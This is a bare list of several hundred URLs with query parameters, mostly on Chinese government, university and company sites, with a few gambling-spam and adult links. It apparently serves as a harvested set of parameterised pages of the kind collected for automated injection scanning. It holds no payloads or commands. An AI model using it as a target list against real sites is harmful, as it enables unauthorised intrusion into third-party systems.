http://www.hzxtwl.com/fuwu.asp?f=6 http://www.hzy291.com/Readgonggao.asp?id=9 http://www.hzyczx.com/content/detail.php?sid=1&cid=200 http://www.hzyhrc.net/Person/Per_Search_Industry.aspx?Param=1 http://www.hzyn.net/news.php?cid=8 http://www.hzyndsp.com/news_x.asp?id=18 http://www.hzyxbj.com/about.asp?id=5 http://www.hzzycwgs.com/About.asp?classid=2 http://www.iainav.org/Services.php?pageSection=1&year=recent http://www.ibas-uk.com/newsPress.php?newsID=55 http://www.iccns.com/about.asp?ID=7 http://www.icmai.net/news/list.php?category=00010 http://www.ictbu.com/rss.php?auth=0 http://www.idea3600.com/aboutus.asp?id=42 http://www.idealmediallc.com/member.php?mod=register 
http://www.idiannaomi.com/forum.php?mod=viewthread&tid=3894&extra=page%3D1 http://www.ie.zjut.edu.cn/htm/xueyuan/down.asp?id=12&title=%E6%97%A5%E5%B8%B8%E8%A7%84%E8%8C%83 http://www.ielts.org//test_centre_search/search_results.aspx?TestCentreSearchSubRegion= http://www.ielyn.com/product.asp?MaxID=28 http://www.ies.imut.edu.cn/SchoolMate/SchoolMateList.aspx?C_ID=1117 http://www.igeek8.com/index.php?type=1 http://www.ihia.org.cn/Expertview.asp?id=98 http://www.i-iot.cn/news_2.asp?Id=113&Tid=8 http://www.iitc.com.cn/LastPageOne.aspx?CTypeID=3 http://www.iitcp.com/InfoWeb/infoManage/StageContentList.aspx?StageCategory_ID=55&Stage_ID=1 http://www.ilync.cn/course.php?id=399 http://www.ilzhx.com/zx/zx/look.asp?id=4889 http://www.imaydesign.com/dongtai.asp?type=98 http://www.imcoal-safety.gov.cn/tongjizhongxin/ShowArticle.asp?ArticleID=1828 http://www.immi.gov.au/About/Pages/detention/about-immigration-detention.aspx?tab=3&heading=immigration-detention-and-community-statistics http://www.impandexp.com/rss.php?auth=0 http://www.importfood.net/agent/xxpro.asp?id=485 http://www.importfoods.net/infos_.asp?id=126 http://www.imspcn.com/dynWeb.asp?dataID=27 http://www.ina.so/about.asp?id=44 http://www.in-ca.org/show.asp?Newsid=367 http://www.indianpharma.in/insideintbizzopp.php?bizzid=17&userid=2126 http://www.infoo.com.cn/wzgn.asp?id=62 http://www.ingenic.cn/cn/cn/industry.php?fid=801 http://www.ini3e.com/forum.php?mod=misc&action=nav http://www.in-minglun.com/about.aspx?id=167 http://www.inswaken.com/menuinfo.php?mId=23 http://www.ioesse.com/ShowNews.asp?ID=284 http://www.ionly.com.cn/nbo/zhanlan/searchvideo.aspx?keyword=%E5%8C%97%E4%BA%AC%E8%89%BA%E9%97%A8 http://www.ioscnc.com/product.asp?rid=56 http://www.iotts.net/show.asp?id=35 http://www.ioudj.com/forum.php?gid=65 http://www.iovweek.com/plus/search.php?lang=gb2312&keyword=%B3%B5%C1%AA%CD%F8&searchbt= http://www.ipadown.com/search.php?t=ios&keyword=%E4%B8%96%E7%95%8C%E6%9D%AF http://www.ipcf6.com/send.asp?typeid=37 
http://www.ipingpang.com/bbs.php?q=OC%C5%E4%BD%BA http://www.iprcn.com/IL_Lwxc_Show.aspx?News_PI=2380 http://www.iraqilogistic.com/news.php?id=10 http://www.irisfmg.com/faq.php?m=extra&n=consigli_manutenzione&cat=11 http://www.irisfmg.eu/faq.php?m=extra&n=consigli_posa&cat=13 http://www.irisfmg.it/faq.php?m=extra&n=consigli_generali&cat=1 http://www.ironrocksailing.com/Activities.asp?id=8 http://www.isimba.cn/appa/view.php?auid=1961 http://www.isoiaf.com/news_list.asp?nclass=12&ncode=0001&classname=ISO9000&mnid=5223 http://www.ispo.com.cn/news_detail.aspx?classid=0&id=2284 http://www.iss.sdu.edu.cn/index.php?m=content&c=index&a=lists&catid=27 http://www.it168.com.cn/customer_more.asp?id=1098 http://www.italina.com.cn/about.php?sortid=149 http://www.ite68.cn/newview.asp?nid=30037 http://www.itstarcom.com/about.asp?classid=1 http://www.iwei2.com/photo.php?type=52 http://www.ixvx.com/chinese/main/article_view.asp?ACID=1&AID=17 http://www.izle.tv/radyokategori_2.asp?kid=40 http://www.j4006.com/news_gonggao.asp?id=28 http://alumni.bjtu.edu.cn/about3.aspx?chid=37 http://mcgovern.med.tsinghua.edu.cn/news.php?xid=2&cid=41 http://bioplastdepuracion.com/index.php?lang=2 http://yntw.net/NewsShow.asp?ListId=43100 http://swjsxyold.swu.edu.cn/show/show.php?id=2044 http://bwc.wtc.edu.cn/picnews.asp?id=22 http://www.zibotcsb.com/about.asp?id=1 http://zkzs.nau.edu.cn/1/sm.asp?id=1 http://www.cnbnge.com/productshow.asp?cid=722 http://www.msme.cn/Intro.asp?id=54 http://www.hslztb.com/xwshow.asp?id=691 http://www.xftyn.com/news2content.asp?ID=62 http://shkxc.hebtu.edu.cn/bks_in.asp?NewsId=1404 http://ime.pim.tsinghua.edu.cn/news_view.asp?id=51 http://sl.zjiet.edu.cn/article_list.asp?pageid=1 http://xnldjt.ynnu.edu.cn/articleview.aspx?id=439 http://jgxy.huat.edu.cn/jwjx2.asp?bigclassid=39 http://hqjt.haust.edu.cn/detail_not.asp?id=273 http://wxy.ahu.edu.cn/download_show.asp?id=380 http://www.tuanerwang.com/tuan/Product_info.asp?id=2233 
http://job.xpu.edu.cn/displaymore.asp?lanmu=%E5%B0%B1%E4%B8%9A%E7%83%AD%E7%82%B9 http://sem.shanghaitech.edu.cn/en/news.asp?id=874 http://qzlx.hue.edu.cn/index.php?action=list&id=91 http://xlzx.huat.edu.cn/xlbk.asp?bigclassid=46 http://sxc.zjc.edu.cn/photolist.asp?classid=7 http://xywhjs.lsnu.edu.cn/cgbz_showid.asp?cgId=6 http://www.rsc.tzc.edu.cn/gsg/more.asp?boardid=10 http://gkpj.scnu.edu.cn/NewsPress.aspx?tid=1 http://sw.wtc.edu.cn/swxy/news.php?typeid=4 http://www.jjdry.com/custom.asp?id=91 http://www.dwgaj.gov.cn/nzcms_list_news.asp?id=728&sort_id=586 http://www.glxdsj.gov.cn/ArticleShow.asp?ArticleID=11418&sort=133 http://www.zhixi.gov.cn/list.asp?btype=%D0%C2%CE%C5%B6%AF%CC%AC&ctype=2 http://www.tlyz.gov.cn/showall.asp?n=%E4%B8%93%E9%A2%98%E4%B8%93%E6%A0%8F&table=tzt&fID=36 http://my.sckjcg.gov.cn/NewsMore.jsp?pCategoryCode=07&CategoryCode=0701 http://www.changyang.jcy.gov.cn/news.asp?partid=12&classid=12&id=577 http://wjj.xinhui.gov.cn/lanmu/openfile2.jsp?tablename=yijianjianyi&id=3&biaoti=%E4%BF%A1%E6%81%AF%E5%8F%8D%E9%A6%88 http://www.zgyjrd.gov.cn/news_show.asp?id=1137 http://www.lyxfw.gov.cn/lyz.jsp?urltype=tree.TreeTempUrl&wbtreeid=1220 http://yqzx.hnziyang.gov.cn/dwxinxi.aspx?id=180 http://www.lyrenda.gov.cn/links.aspx?id=17 http://wsxf.lepingshi.gov.cn/email_index.asp?DepartNo=001000000 http://www.dywgx.gov.cn/yjzjcontent.aspx?id=3455d8bc-7ca7-47ee-95b1-b9bede1a9755 http://lgj.kaiping.gov.cn/article.asp?id=793 http://www.jrzct.gov.cn/doc_list.jsp?zc_type=zcyw http://xxgk.wfbinhai.gov.cn/gknb.php?menuid=222 http://wmcj.amb.gov.cn/content.asp?lclass_ID=83&id=17366 http://jtj.snqindu.gov.cn/infoshow.asp?id=39&newsid=79 http://www.cxspb.gov.cn/Shequ.aspx?typeId=1&n=64654 http://www.bzqgt.gov.cn/Class.asp?PrdID=10 http://jsfamous.js.cei.gov.cn/cybj1.php?id=1391 http://www.tcgrain.gov.cn/list.aspx?sort=%e7%b2%ae%e6%b2%b9%e7%a7%91%e6%99%ae http://www.sdbzgyyq.gov.cn/mailbox.php?feedback_type=1 http://www.chgsj.gov.cn/zmhd.asp?id=3 
http://www.tssfj.gov.cn/webui/Article_content.aspx?cid=956 http://olds.scpc.gov.cn/Nav_hudongjiaoliu_yldc.asp?SS_ID=334&VoteID=124 http://www.sxsfxz.gov.cn/article.jsp?articleid=4378 http://www.wldjw.gov.cn/wz.asp?id=24 http://sp-sipac.gov.cn/gzjd/detail.aspx?id=1 http://www.cfsszx.gov.cn/classinfo.asp?class=134 http://www.tgsqjjjc.gov.cn/article.php?MsgId=92913 http://nw.nova.gov.cn/qyfcdt.aspx?id=20110530091655278768 http://ly.bjpop.gov.cn/hd/zxtx_show.asp?sid=110 http://www.bzsly.gov.cn/brow.asp?classid=4 http://invest.dyzw.gov.cn/Enterprise_List.asp?AgencyID=1 http://www.smegz.gov.cn/web/assembly/action/browsePage.do?channelID=1106368053173&contentID=1366381158396 http://www.xmipo.gov.cn/bsznShow.aspx?NewsId=77 http://www.htwj.gov.cn/detail.asp?type_id=3&stype_id=3&id=453 http://www.btjyrd.gov.cn/news_xwsd.asp?ClassID=14 http://www.asdjj.gov.cn/news.asp?id=26 http://www.xjtsq.gov.cn/list.jsp?urltype=tree.TreeTempUrl&wbtreeid=1006 http://www.xzetdz.gov.cn/faceshow.asp?ID=288&ClassID=BX08041410575245 http://web.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.lzqq.gov.cn/article_guest.asp?guestid=18 http://www.whyz.gov.cn/readnews.php?class=%E8%B5%84%E6%96%99%E4%B8%8B%E8%BD%BD&subclass=%E8%B5%84%E6%96%99%E4%B8%8B%E8%BD%BD http://www.qhdkjj.gov.cn/showpar.jsp?mas7awqiq09kqiylif5sadm=50&v=jc_lm&zt= http://www.chlsj.gov.cn/zmhd.asp?id=10 http://www.xilin.gov.cn/app/online/PageView.jsp?id=794850e035fc11e3832af80f41f81b9d http://smz.yantai.gov.cn/xxxx.aspx?xxxxB0110=037006000482&sign=1&B0110=037006 http://zfbz.10.gov.cn/about.asp?smallclassid=317 http://www.jxdcn.gov.cn/cg_left.asp?id=1 http://www.meihaowu.com/domain.asp?name=yijiahao.com http://www.dlszwy.com/info.asp?id=174 http://szpxjtj.cn/kwd.php?id=378 http://www.ccsylh.com/info.php?class=1 http://nmc.gov.cn/cms/article.php?articleId=61 http://xck91.com/plus/search.php?q=%E8%B5%8C%E7%90%83%E7%BD%91%E9%AB%98%E5%B0%94%E5%A4%AB%E5%A8%B1%E4%B9%90%E5%9C%BA http://www.gzctsm168.com/cpzxshow.aspx?x_id=12 
http://www.suihua.gov.cn/qybs/qybslist.aspx?articletypeid=bb95dd5a-c0d2-4f9d-bac4-89ad80b7705f http://m.ypbxygw.gov.cn/list.asp?type=2&c=20107895055150 http://www.realestate.cei.gov.cn/110/zxbr.aspx?id=201472464308 http://www.cdjngy.com/pro.asp?Cid=133 http://www.hecom.gov.cn/gcjs/List.aspx?id=108 http://www.sbtgj.com/product_detail.asp?id=2580 http://www.xzlpc.com/class.asp?lx=big&anid=5 http://jydylc739.com/kwd.php?id=317/ http://www.xfj.suzhou.gov.cn/news.asp?selectclassid=010001 http://www.hasrat.cn/kino_tur.php?tur=44 http://www.sdfgjg.com/listhyzx.asp?id=322375 http://www.gsdbjob.gov.cn/search_result.aspx?hyid=%E6%9C%BA%E6%A2%B0%E3%80%81%E6%9C%BA%E7%94%B5%E3%80%81%E4%BB%AA%E8%A1%A8%E7%B1%BB http://www.knowlogy.com/about_us/postDetails.aspx?id=6 http://www.ahbbjjjc.gov.cn/article.php?MsgId=90652 http://www.hzhdgb.com/ProductShow.asp?ID=138 http://guilin.net/tour/China/ShowClass.asp?ClassID=75 http://www.zzsz.gov.cn/dgtwenjian.asp?articleid=96 http://www.dgxh168.com/conx.asp?id=72 http://www.yzlzdq.com/company.asp?id=2 http://jz.dqjsj.gov.cn/bigclass.asp?typeid=15&bigclassid=32 http://www.czjtj.gov.cn/ShowNews.asp?id=3170 http://www.ypsgy.com/pshow.asp?ClassID=8&id=114 http://www.hshzkb.com/city_index.aspx?city=shenzhen http://www.secri.gov.cn/index.php?mod=intro&articleid=1 http://www.hsheiji.com/news_more.asp?id=155 http://www.yinfei56.com/contact.asp?id=401 http://www.cdlcly.com/city_index.aspx?city=sichuan http://www.fydzb.com/product.asp?BigClassId=1 http://www.gz-hk.com/Brand.asp?aid=3 http://www.led-guanhong.com/xinwen/news2.asp?ID=750 http://haayyl.si.gov.cn/list.asp?id=5553 http://www.kk90.net/plus/search.php?q=%E9%98%B3%E5%85%89%E5%BF%83%E6%80%81%E5%BF%83%E5%BE%97%E4%BD%93%E4%BC%9A http://www.xinzhen168.com/about.asp?id=37 http://www.chjjkfq.gov.cn/view.asp?id=544&cid=115 http://www.nbet.cn/Recruitdetail.aspx?psn=JP2400 http://www.weather.gov.cn/cms/article.php?articleId=61 http://www.zyhospital.cn/plus/search.php?q=%D6%D0%B6%FA%D1%D7&searchtype=title 
http://www.monsitegratuit.com/dossiers/article.php?new=15 http://www.660123.com/rss.php?auth=0 http://www.sxtcrd.gov.cn/News.aspx?id=11&oid=1 http://www.jcxinxi.com/plug/tags.asp?tag=%E5%A4%AA%E9%98%B3%E5%9F%8E%E5%A8%B1%E4%B9%90%E7%BD%91%E7%AB%99 http://www.15895595058.net/bigSortProduct.asp?bigid=116 http://www.hulupf.com/adproduct.asp?id=98 http://www.talent-chemical.com/newskx1.asp?newid=1013 http://www.zhongguomeishubao.com/portals/default/aboutus.aspx?catalog_id=e55ac147ca2842c8aec52d3c3bf28aeb http://www.yfyjhg.com/News_detail.asp?id=375 http://www.lgfy.com/about.asp?id=7 http://www.cx0839.com/news/comment.aspx?Nid=890 http://www.jslirong.com/en/news_view.asp?id=46 http://www.yzssdfg.com/city_index.aspx?city=shandong http://www.ykff.gov.cn/about.asp?id=1 http://jsyineng.com/productdetail.php?id=77 http://www.cngbol.net/Industry/default.aspx?ModuleNo=0304 http://www.cn3519.com/News_view.asp?NewsID=742 http://www.bxgwdlfm.com/cpdis.asp?id=1170 http://zywlyy.cn/nj-lyb-1.asp?id=13896 http://www.jnkgsk.com/info.asp?id=1 http://www.cn148.org/List.aspx?class1=100&class2=103 http://www.xmhctz.com/activities_info.aspx?News_Id=248&CateId=6 http://yongding.com.cn/company.aspx?Baseinfoid=4 http://hb.ahnw.gov.cn/aspx/gqxx.aspx?gqtype=0 http://www.lccichina.com/content.asp?id=100 http://www.sdxnw.gov.cn/document_show.asp?id=76159&mark=101 http://www.lfydfh.com/city_index.aspx?city=tianjin http://qdykyul.cn/kwd.php?id=800 http://www.rentalpulse.com/Archives/ArchivedIssue.aspx?m=7&y=2014&d=6 http://160w.net/bbs/list.asp?classid=1228&sid=-0 http://www.wxqxmj.com/city_index.aspx?city=wuxi http://www.tsinghuaguoxue.cn/common.asp?id=1 http://www.jienengmo.com/jien/info_article.asp?id=1786&type=%E4%BE%9B%E6%B1%82%E4%BF%A1%E6%81%AF http://www.fjzzrd.gov.cn/web/cwhgk.asp?LMid=25 http://www.ruanjianbbs.com/plus/search.php?q=%E9%83%91%E5%AE%B9%E5%92%8C http://www.chinarehh.com/house/news/item.php?houseid=27&itemid=187 
http://www.bincheng.gov.cn/bc/sites/main/jyxc2.jsp?TID=20110915155125400552039 http://wxxxtc.com/news.asp?lt=25 http://www.bm0392.com/adindex.asp?shi=3 http://www.quartzcn.net/ktxx.asp?leibie=%E5%9F%B9%E8%AE%AD%E5%AD%A6%E6%A0%A1 http://www.chsajj.gov.cn/Gzdt.asp?classid=2 http://www.sh-haust.com/more_info.asp?qq=%D0%D0%D2%B5%B6%AF%CC%AC http://www.tianjinicp.com/about.asp?id=164 http://gyfzj.gzedz.gov.cn/default.php?mod=article&fid=1 http://www.cqhhedu.com/NewsClasses.asp?fenlei=%D7%CA%D1%B6%D6%D0%D0%C4&an=4&erj=4 http://www.jnlzhg.com/list.php?lmid=5 http://www.czzdpack.com/cpshow.asp?showid=363 http://www.szyoxin.com/productshow.asp?ArticleID=413 http://www.ahsxjjjc.gov.cn/article.php?MsgId=92980 http://www.kcjsj.gov.cn/news_view.asp?id=595 http://www.xiuxingtang.com/news/detail.asp?id=1 http://www.aomen-dubowangzhan.com/forum.php?mod=rss&auth=0 http://www.dlyouth.gov.cn/news_other_view.php?n_id=170&n_sel=1 http://www.lantian.gov.cn/hd_mail_view.aspx?id=2210 http://www.njmcls.com/cpzs.asp?bid=71 http://www.sqmlr.gov.cn/qlyg_web/sb.jsp?itemid=JS130000GT-QR-0001 http://www.ccqpop.gov.cn/news/lump.asp?lumpID=lx001 http://jinrong.wangjing.gov.cn/Product.aspx?tzkind=%E5%A4%9A%E6%A0%B7%E6%8B%85%E4%BF%9D http://www.halalstock.com/product.asp?pID=6377 http://www.dfltmjw.com/atlas_show.php?id=37&tid=1 http://cnxjc.cn/news.asp?nlt=8 http://www.zydrum.com/display.asp?id=934 http://www.tacourt.gov.cn/clsz.jsp?pxh=18&progbh=18&axh=2 http://www.chde.cn/feedback.aspx?tq=19 http://www.bjlemmen.com/fwxm.asp?type=FWXM2&id=29 http://www.dakunjiaju.com/city_index.aspx?city=sichuan http://maijiuwang.cn/pages.asp?pid=1 http://www.sysjtj.gov.cn/flfg_nei.asp?n_id=89 http://www.pd-scr.com/aboutus.asp?catid=1&ID=1 http://www.tangxian.gov.cn/cxtx/bumennewslist.asp?menuId=&menuCode=cxtx_bmxx&menuName=%E9%83%A8%E9%97%A8%E4%BF%A1%E6%81%AF http://www.worldfodder.com/company/huangye_detail.php?&id=86671 
http://www.juxianfc.com/plus/advancedsearch.php?mid=17&q=%BA%A3%C4%C9%BC%D2%D4%B0&submit=%BF%AA%CA%BC%CB%D1%CB%F7 http://www.zzydjf.com/city_index.aspx?city=zhengzhou http://www.dqst.gov.cn/zwgk/more.php?RecNo=A01B01&SortName=%E8%A6%81%E9%97%BB http://www.csswf.cn/cf_details.asp?id=6642 http://www.sunsgrainhotel.com/page.php?id=17 http://www.rzjs.gov.cn/gonggao/E_ReadOpinion.asp?LeadMailID=751 http://www.sjzhuihe.net/about.asp?id=3 http://www.yndianlijinju.com/product.asp?lei=36&viewType=2 http://www.watertek.com/newsinfo.aspx?NewsId=1013&CateId=9 http://www.yysedu.com/about/schoolprofile.asp?tt=3 http://www.jhdlock.com/city_index.aspx?city=shenyang http://www.waterfallguilin.com/meeting_info.asp?id=51 http://nnqianfan.com/news_view.asp?id=218 http://www.gllawyer.cn/lawyer.php?BigID=2 http://www.hssxx.gov.cn/gb/index.asp?user=hssxx http://jyiss.lsz.gov.cn/GPI/index.aspx?dept=92337927 http://www.fnxww.gov.cn/news.asp?classid=72 http://www.1997fz.com/news_view.asp?id=361 http://hn.ahnw.gov.cn/aspx/zjwd.aspx?TemplateType=3&Id=FA52837B-0AF9-45AB-97EB-CCD1C33CEABF http://www.fuipackaging.com/productshow.asp?ArticleID=R9Y011PVXU http://www.yxcf.net/Big.asp?big_id=8 http://www.jinpengwood.com/info.asp?id=5 http://www.hdyg.com/baihuo.asp?id=147 http://yg.xznlw.gov.cn/list_1.asp?code=1&id=2328 http://www.lnrkw.gov.cn/newsshow.asp?ArticleID=3382 http://www.xjpi.gov.cn/index.jsp?urltype=tree.TreeTempUrl&wbtreeid=11210 http://www.xtnk120.com/about.asp?id=16 http://www.ynrdra.net/bencandy.php?fid=10&id=1885 http://zn85.net.cn/news.asp?id=21 http://www.szbsh.com/EN/listnews.asp?id=72 http://www.whasdjx.com/cp_list.asp?id=526 http://www.xhagri.gov.cn/zbft/Fangtan.asp?id=11 http://www.ctgusec.com/news_more.asp?id=1&uid=x2 http://www.cl.yn.gov.cn/list.aspx?ColumnId=48 http://www.qzrf.gov.cn/cjwtlist.aspx?t=1 http://www.linyimost.gov.cn/news/lzview.asp?NewsID=2534&classID=35 http://jb100.com/sjjb_news/List.aspx?id=3 http://www.lionfulfoundation.org/cn/ZhuanTi_Photo.aspx?PH_ID=52 
http://365856.com/archives/detail.php?id=jinpai http://www.huishige.com/plus/search.php?q=%E9%BB%84%E9%87%91%E9%A6%96%E9%A5%B0 http://www.ybjks.com/Article_Class.asp?ClassID=1 http://www.zycredit.gov.cn/moreinfo.do?lm=0;1 http://woman.org.cn/cover_cat.asp?id=1 http://www.yjjj8.cn/TeaSortByDid.asp?Did=1843 http://www.stonebridge.com/author_detail.asp?id=5&name=Donald%20Richie http://www.xyxcgj.gov.cn/list.asp?sort_id=657 http://www.chinadopower.com/docc/product.asp?menu_i=4&p_c_id=603&c_id=603 http://www.bzfsmm.com/xiangxi.php?pro_id=98 http://dt.daqing.gov.cn/danji_info.asp?id=15329&t=%E5%AA%92%E4%BD%93%E7%9C%8B%E5%A4%A7%E5%90%8C http://www.zjgzb.com/list.asp?ProdId=0037 http://www.355589.com/rss.php?auth=0 http://www.djinfo.gov.cn/MarketList.aspx?code=xxfb http://www.aksrsj.gov.cn/E_Alldep.asp?start=2013-01-01&end=2014-7-26 http://www.kangzifu.com/EN/product/productData.aspx?pid=120 http://www.100m100.com/aboutus.asp?parentid=425 http://www.gb6479.com/cpshow.asp?id=46 http://www.tjha.org.cn/ViewInfo.asp?id=545&sortname=%E4%BC%9A%E5%91%98%E4%BC%81%E4%B8%9A&sortid=81 http://www.chinaat.org/about.asp?s_id=2 http://www.lqngo.gov.cn/content.asp?id=5 http://www.shsm.org.cn/detail.asp?id=26191 http://www.yingquan.gov.cn/zmhd/live_view.php?lid=156 http://www.yalaba.com/kino/content.php?id=624 http://www.sdkendeji8.com/info.asp?id=1 http://www.zastny.com/info.asp?id=36 http://www.ahczly.gov.cn/hdcy/zxzx_show.jsp?ID=39 http://www.dhjs.gov.cn/Detail1.asp?classid=1 http://www.fdslbyq.com/cp.asp?class=001 http://www.lxwzj.com/product.asp?class=1&classname=%E5%85%A8%E8%87%AA%E5%8A%A8%E6%95%B0%E6%8E%A7%E5%BC%AF%E5%AD%97%E6%9C%BA http://www.qzgjj.gov.cn/gjj/news.asp?id=41 http://www.hymn.cn/en/about_detail.asp?type_id=10&id=11 http://www.yydpc.gov.cn/Default3.aspx?guid=82629da6-9ef5-4ebb-9a4a-c9de8700c534 http://www.pyjcl.com/city_index.aspx?city=guangzhou http://www.dire365.com/info.php?n=2&id=1 http://www.cevtc.com/list.asp?id=627 
http://www.xywdhs.com/newshow.asp?id=232&mnid=7777&classname=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&uppage=news.asp http://www.fenxi.gov.cn/Fxzt.asp?ClassID=253 http://www.ytsuliao.com/info.asp?id=1 http://mzj.nc.gov.cn/articledisp.aspx?infoid=3373 http://crei.cei.gov.cn/110/zxbr.aspx?id=201472464308 http://www.scfuture.com/Aboutus.php?categoryid=13&id=6 http://www.zjjfw.cn/search.php?chid=4&caid=2&letter=A http://www.wljx.gov.cn/About.asp?ID=26 http://www.queshan.gov.cn/xxpt/onews.asp?id=28 http://www.chinatdt.cn/productshow.asp?lt=283 http://www.qydjw.gov.cn/itoa_view.asp?id=24 http://www.jnbj0531.com/news.asp?id=325 http://www.jnjex.com/list.asp?flag=news&type=rdxw http://bbs.tjlottery.gov.cn/rss.php?auth=0 http://www.990lp.com/article.php?id=60 http://www.nmgsft.gov.cn/tpxw/pic_detail.asp?id=130 http://tzgymdn.cn/kwd.php?id=190 http://www.0512logo.com/about.asp?id=990&file=%E5%85%AC%E5%8F%B8%E4%BF%A1%E6%81%AF&title=%E5%85%B3%E4%BA%8E%E6%88%91%E4%BB%AC http://www.dtxs.cn/article.asp?sortid=14&id=2497 http://www.yzjjjc.gov.cn/article.php?MsgId=91080 http://www.joind.gov.cn/kjcx1/kjrc-a-2.asp?id=673 http://www.sctggs.com/news_detail.asp?id=229&fenlei=%E5%B7%A5%E7%A8%8B%E4%B8%9A%E7%BB%A9 http://www.988114.net/cominfo.asp?Id=1193 http://www.cdpop.gov.cn/redirect.jsp?id=348941 http://www.0523game.com/forum.php?mod=rss&auth=0 http://www.oufusi.cn/eproducts_all.asp?pro_type=77 http://www.zyyf520.com/ActiviDefault.aspx?id=13 http://www.shnoblift.com/products.asp?classid=4 http://www.elitimes.com/newsinfo.aspx?id=282&tid=32 http://www.hongxiajiaju.com/info.asp?id=1 http://info.wzta.gov.cn/yxwz/yxwz_list.php?type=1 http://www.lylsws.gov.cn/list.asp?cataid=7 http://www.gangchengjuyazhai.com/news/detail.asp?id=1 http://www.sxycnw.gov.cn/Bottom.aspx?sid=1 http://www.tiedong.gov.cn/newsmore.aspx?classid=1 http://www.theplace.cn/Changdzy.aspx?sid=77&suid=153 http://interact.ouhai.gov.cn/countView.jsp?id=z2jylwvj6 http://www.ycdrc.gov.cn/all/type_pws.asp?typeid=27 
http://www.yichangpos.com/newshow.asp?id=100&nclass=4&classname=%D0%C2%CE%C5%D6%D0%D0%C4 http://www.chunhuizk.com/ennewsSingle.aspx?ID=1 http://www.35crmogb.com/yuangang.asp?id=1141 http://www.cqbashi.com/fwxx/showxx.asp?id=6&type=5 http://www.bjlfh.com/gp.asp?id=7 http://www.zsaohe.com/news_detail.asp?id=292 http://www.jxqfls.com/NewsView.asp?Id=97 http://www.guijinshuhuishou.com/cp_view.asp?id=722 http://lyj.wuhai.gov.cn/readnews.php?class=%E6%9E%97%E4%B8%9A%E6%A6%82%E5%86%B5&subclass=%E6%9E%97%E4%B8%9A%E5%9F%BA%E6%9C%AC%E6%83%85%E5%86%B5&sid=1 http://www.snnsf.gov.cn/xwdt/viewdetaila.asp?info_id=204 http://www.whtwolife.com/city_index.aspx?city=wuhan http://www.sclyw.gov.cn/newsview.asp?id=1694 http://www.hdlvshi.com/news.asp?bid=30 http://www.hblsj.gov.cn/InfoPublish/CategoryViewNormal.aspx?child=130&parent=129&CategoryName= http://www.cnshele.com/new_c.asp?id=80 http://fuxin-cn.com/ch/jobs.aspx?n_type=1 http://www.tjj.nbyz.gov.cn/Page/ListPage.aspx?ListID=16380&ModuleID=364 http://www.tjyqmusic.com/news-show.asp?id=274&getclass=%E4%BD%9C%E5%93%81%E6%AC%A3%E8%B5%8F&smallclass= http://www.jstysgt.com/news.asp?lt=46 http://www.yclynk.gov.cn/newsview.asp?id=158 http://www.cnsfet.com/news/main.asp?typeid=18&type=%D0%D0%D2%B5%D0%C2%CE%C5 http://www.meihuahotel.com/page.php?id=17 http://www.gdjunnuo.com/newsshow.asp?id=90 http://www.odnjx.com/cp.asp?ClassID=1 http://www.ynuxls.com/product.asp?lei=36&viewType=2 http://www.ak.gov.cn/Government/Approval/WorkItemList.aspx?categoryId=1 http://www.csjlm.com/cpshow.asp?proid=121 http://www.zjyywz.net/news_tables.aspx?new_lei=1 http://wandaedu.cn/edus.asp?lb1=12 http://www.ahtlxjjjc.gov.cn/article.php?MsgId=84285 http://www.txsifaju.gov.cn/newsInfo.asp?id=DB848A86-1889-4F99-B35E-4B46DDA59E17&menuId=BB0EF30B-1263-4B3E-901D-773ED450CC0E&menuName=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81 http://www.hnwdba.com/news/shownews.php?lang=cn&id=37 http://xtzj8.com/kwd.php?id=79/ http://www.nws.gov.cn/net/xxgk/zwList.aspx?cid=87 
http://www.lljcy.gov.cn/jwgk.asp?bianhao=711&Action=show http://www.gycydq.com/city_index.aspx?city=liupanshui http://www.yzagri.gov.cn/bmfw/con_detail.php?id=979 http://www.tlcz.gov.cn/Data/Data_content.aspx?trans_data_id=1813 http://www.juntongsoft.com/company.asp?id=7 http://www.under-dx.com/hiroshima/girls_search.php?newface=1&list=photo http://www.jnjiansuji.com/pro.asp?id=215&mm=%E5%BE%AE%E5%9E%8B%E6%91%86%E7%BA%BF%E5%87%8F%E9%80%9F%E6%9C%BA http://www.pznet.cn/gywm.asp?id=767 http://www.wxxiaopingji.com/city_index.aspx?city=wuxi http://fda.yantai.gov.cn/YTIICSMDH/show.jsp?id=231893 http://www.zsaqjg.gov.cn/news/news_index1.asp?typeid=1&borderid=20&thirdid=14 http://www.slpop.gov.cn/content.do?method=sendTo&cid=106 http://www.taxlapka.com/art.php?tur=1 http://www.yncyds.cn/cpzs_show.asp?cpzsid=473 http://price.hnjtzj.gov.cn/DealerPriceList.aspx?k=%e7%ae%a1%e6%9d%90 http://www.jian-she.cn/company.asp?id=1 http://www.wumingyuan.com/NewsImgList.aspx?Type=5 http://www.hxsh-market.com/rss.php?auth=0 http://www.zjzsf.com/products.asp?class1id=93 http://www.shbaokang.com/news_detail.php?post_id=117 http://hszh.yantai.gov.cn/HSZHAXHD/index_show.jsp?id=231284 http://www.lushi.gov.cn/news/news_more.asp?lm=82 http://www.bzein.gov.cn/jgsz.asp?id=8 http://www.ymzms.com/about.php?cid=10 http://www.ntkdroof.com/list.asp?id=2 http://timberbiz.com.au/calendar/default.asp?show=116 http://www.taoyiran.com/movie_show.asp?id=155 http://www.zjach.com/about.asp?tyc=146 http://www.ztda.zt.gov.cn/readinfo.aspx?B1=03c1bcd8e03f4cb0846a96e4200a2079 http://shemaleporncomics.com/shemale.php?id=admin http://www.bocaits.com/rss.php?auth=0 http://zx.kerqin.gov.cn/Players.asp?id=25 http://www.jbwjjd.gov.cn/zttj_more.asp?ztid=11 http://www.fjxhfx.com/jsp/search/searchItem.jsp?table=t168&column=Category&key=1&mode=t168&order=PubTime%20desc&flag= http://ffuzhengpz.cn/shownews.asp?id=13299 http://pnyaocai.com/bj_info.asp?id=1348 http://www.jyjj.gov.cn/jj_content_type.asp?jj_title_type=1 
